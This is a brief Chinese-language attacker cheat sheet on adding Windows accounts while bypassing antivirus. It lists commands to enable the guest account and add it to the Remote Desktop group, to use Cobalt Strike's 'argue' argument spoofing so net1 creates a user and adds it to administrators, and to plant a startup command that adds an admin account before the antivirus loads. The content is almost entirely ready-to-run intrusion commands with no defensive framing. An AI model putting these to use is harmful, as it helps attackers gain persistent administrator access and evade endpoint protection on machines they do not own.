Win绕过AV添加账号

Win绕过AV添加账号

  • 开启来宾用户

net user guest /active:yes

net user localgroup “Remote Desktop User” guest /add

由于无法直接添加管理员组,所以为了远程连接,添加到远程连接组

  • CS的argue命令参数污染。

argue net1 xxxxx

execute net1 user test /add

execute net1 localgroup administrators test /add

  • 添加优先级高于AV的启动项

C:/windows/system32/cmd.exe /c net user test /add;net localgroup administrators test /add